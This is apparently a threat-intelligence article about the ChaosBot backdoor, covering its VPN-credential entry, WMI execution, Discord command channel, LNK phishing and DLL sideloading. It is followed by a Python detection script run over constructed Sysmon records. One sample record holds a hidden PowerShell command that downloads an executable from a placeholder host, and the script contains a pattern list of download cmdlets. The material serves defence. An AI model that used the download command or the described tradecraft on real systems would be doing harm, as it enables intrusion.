
"Threat actors leveraged compromised credentials that mapped to both Cisco VPN and an over-privileged Active Directory account named, 'serviceaccount,'" eSentire said in a technical report published last week. "Using the compromised account, they leveraged WMI to execute remote commands across systems in the network, facilitating the deployment and execution of ChaosBot." The Canadian cybersecurity company said it first detected the malware in late September 2025 within a financial services customer's environment.
It gets its name from a Discord profile maintained by the threat actor behind it, who goes by the online moniker "chaos_00019" and is responsible for issuing remote commands to the infected devices. A second Discord user account associated with C2 operations is lovebb0024. Alternatively, the malware has also been observed relying on phishing messages containing a malicious Windows shortcut (LNK) file as a distribution vector.
ChaosBot is a Rust-based backdoor that enables reconnaissance, arbitrary command execution, and persistent access on compromised Windows hosts. Operators gained initial access using compromised Cisco VPN credentials and an over-privileged Active Directory account named 'serviceaccount', then used WMI for remote execution and deployment. The malware uses Discord accounts (chaos_00019 and lovebb0024) for command-and-control and has been distributed via phishing with malicious LNK files that trigger PowerShell to download the payload while displaying a decoy PDF. The payload is a sideloaded DLL named msedge_elf.dll launched via identity_helper.exe, which performs reconnaissance and deploys an FRP reverse proxy. Attackers also attempted to configure a Visual Studio Code Tunnel for additional access. Detection occurred in late September 2025 in a financial services environment.
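The intrusion chain summarised above has three stages that leave distinct traces in endpoint telemetry: an LNK opened from Explorer spawning a PowerShell download, a copy of identity_helper.exe running (and loading msedge_elf.dll) from somewhere other than the Edge install tree, and shells spawned by the WMI provider host under the over-privileged account. The following is an added detection example, not code from eSentire or The Hacker News. It runs three heuristic rules over constructed Sysmon-style records; the Sysmon field names (Image, ParentImage, CommandLine, ImageLoaded, User) are real, while the Edge install-path marker, the download-cmdlet list, the sample paths and the watchlist are assumptions chosen for illustration.

```python
"""Heuristic detection for the ChaosBot stages described above, run over
constructed Sysmon-style process-create (EventID 1) and image-load (EventID 7)
records. Added example; field names follow Sysmon, everything else is assumed."""
import ntpath
import re

# Edge ships identity_helper.exe and msedge_elf.dll under this tree; either one
# running or loading from elsewhere is the sideloading signal (assumption).
EDGE_INSTALL_MARKER = "\\microsoft\\edge\\application\\"

# Accounts treated as high-value. 'serviceaccount' is the name from the report.
WATCHLIST_ACCOUNTS = {"serviceaccount"}

# Common PowerShell download primitives (assumed list, extend as needed).
DOWNLOAD_CMDLET_RE = re.compile(
    r"invoke-webrequest|iwr\b|downloadfile|downloadstring|net\.webclient|start-bitstransfer",
    re.IGNORECASE,
)


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path, portable across host OSes."""
    return ntpath.basename(path).lower()


def _user_name(user: str) -> str:
    """'DOMAIN\\name' -> 'name'."""
    return user.rsplit("\\", 1)[-1].lower()


def rule_lnk_powershell_download(ev) -> bool:
    """LNK opened from Explorer spawning PowerShell that fetches a payload."""
    return (ev.get("EventID") == 1
            and _base(ev.get("Image", "")) == "powershell.exe"
            and _base(ev.get("ParentImage", "")) == "explorer.exe"
            and DOWNLOAD_CMDLET_RE.search(ev.get("CommandLine", "")) is not None)


def rule_edge_helper_sideload(ev) -> bool:
    """identity_helper.exe running, or msedge_elf.dll loading, outside the Edge tree."""
    if ev.get("EventID") == 1:
        path = ev.get("Image", "")
        return _base(path) == "identity_helper.exe" and EDGE_INSTALL_MARKER not in path.lower()
    if ev.get("EventID") == 7:
        path = ev.get("ImageLoaded", "")
        return _base(path) == "msedge_elf.dll" and EDGE_INSTALL_MARKER not in path.lower()
    return False


def rule_wmi_remote_shell(ev) -> bool:
    """Shell spawned by WmiPrvSE.exe: the footprint of WMI remote command execution."""
    return (ev.get("EventID") == 1
            and _base(ev.get("ParentImage", "")) == "wmiprvse.exe"
            and _base(ev.get("Image", "")) in {"cmd.exe", "powershell.exe"})


RULES = {
    "lnk_powershell_download": rule_lnk_powershell_download,
    "edge_helper_sideload": rule_edge_helper_sideload,
    "wmi_remote_shell": rule_wmi_remote_shell,
}


def detect(events):
    """Return (rule_name, record_index, severity) per match; severity is raised
    to 'high' when the acting account is on the watchlist."""
    findings = []
    for i, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                sev = "high" if _user_name(ev.get("User", "")) in WATCHLIST_ACCOUNTS else "medium"
                findings.append((name, i, sev))
    return findings


# Constructed sample telemetry (not real logs; paths and version are made up).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\jdoe",
     "CommandLine": "powershell -w hidden -c \"iwr http://example.invalid/p -OutFile $env:TEMP\\x.exe\""},
    {"EventID": 1, "Image": r"C:\Users\jdoe\AppData\Local\Temp\identity_helper.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "User": r"CORP\jdoe", "CommandLine": "identity_helper.exe"},
    {"EventID": 7, "Image": r"C:\Users\jdoe\AppData\Local\Temp\identity_helper.exe",
     "ImageLoaded": r"C:\Users\jdoe\AppData\Local\Temp\msedge_elf.dll", "User": r"CORP\jdoe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "User": r"CORP\serviceaccount",
     "CommandLine": "cmd.exe /c whoami"},
    # Benign controls: genuine Edge helper from its install tree; Explorer launching Notepad.
    {"EventID": 1, "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\120.0.0.0\identity_helper.exe",
     "ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "User": r"CORP\jdoe", "CommandLine": "identity_helper.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\jdoe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The path check is what keeps the sideloading rule from firing on every Edge install: both binaries are legitimate Edge components, so the anomaly is their location, not their names. The WMI rule deliberately does not look for any particular command; the WmiPrvSE.exe parent plus a shell child is the durable signal, and the watchlist turns a hit under the over-privileged account into a high-severity finding.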
Read at The Hacker News